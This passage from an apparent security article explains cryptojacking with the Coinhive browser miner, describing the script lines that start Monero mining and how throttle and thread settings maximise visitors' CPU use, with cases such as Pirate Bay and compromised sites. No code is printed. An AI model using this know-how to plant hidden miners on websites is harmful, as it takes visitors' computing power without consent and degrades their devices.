and it mines for Monero (XMR). It was implemented as an alternative revenue-gathering method to ads for website administrators. Its workflow consists in running the script directly in the visitor’s browser and then starting to mine for cryptocurrency in the background by using its CPU power. But, hackers took this service and deployed it on vulnerable websites that they had exploited and thus started to anonymously and silently mine cryptocurrency every time the website was accessed. Of course, they never even discussed asking for permission by bringing this aspect to the attention of the victim. Power lies in numbers: More exploited websites equals more unique visitors, which in return equals more CPU power and the obvious result translates into more crypto-bucks.
From a hacker’s perspective, this fraudulent scheme implies a low use of resources and the possibility of unlocking a treasure filled with money, that’s why it will gain more and more popularity. But, what are the consequences for its victims? Well, here we can expect anything ranging from poorer performance of their device as determined by the CPU spike to even a shortening of the CPU life due to overheating. Some other results could be a lower duration of battery’s cycle.
The first script source line will instruct the victim’s browser to download the .js file from the Coinhive website. The miner variable line will tell Coinhive which account is mining for the Monero cryptocurrency – our unique site key and the “miner.start” line triggers the mining immediately.
Of course, more advanced features can be used in such scripts, like threads and throttle:
Throttle basically refers to a process responsible for regulating the rate at which application processing is conducted. Or to put it as simple as possible, it can be used to configure the CPU power used. A lower throttle combined with a higher threads number will produce the maximum effect, as they decide how much CPU power will be used in the client’s browser.
A few months ago, a victim of the cryptocurrency loving hackers was the reputable site blackberrymobile.com.
Unfortunately, because of the amazing amount of money that can be “earned” in a relatively short amount of time and with implied costs near zero, not only hackers decided to get a piece of the cake. The well-known torrent site “The Pirate Bay” is among those to have used the Coinhive code and neglected to tell visitors it was using their browsers to mine cryptocurrency. So, this wasn’t an action that could be attributed directly to hackers, but to this website’s administrator.
These kinds of attacks were, of course, set to work on all available platforms, like Windows, Linux, and MacOS. Coinhive was also implemented to work on mobile devices. Several apps that used this mining technology were found in Google Play Store and this stealth behavior was triggered right after installation.
Some malicious ads even popped up on YouTube after a threat actor managed to inject a coin miner script into them. Fortunately, YouTube found the issue and fixed it in a matter of hours.
Think twice before investing in such coins as the cryptocurrency market approaches its saturation. Bitcoin is the oldest and the most expensive cryptocurrency. Its ups and downs alter the state of all the other cryptocurrencies.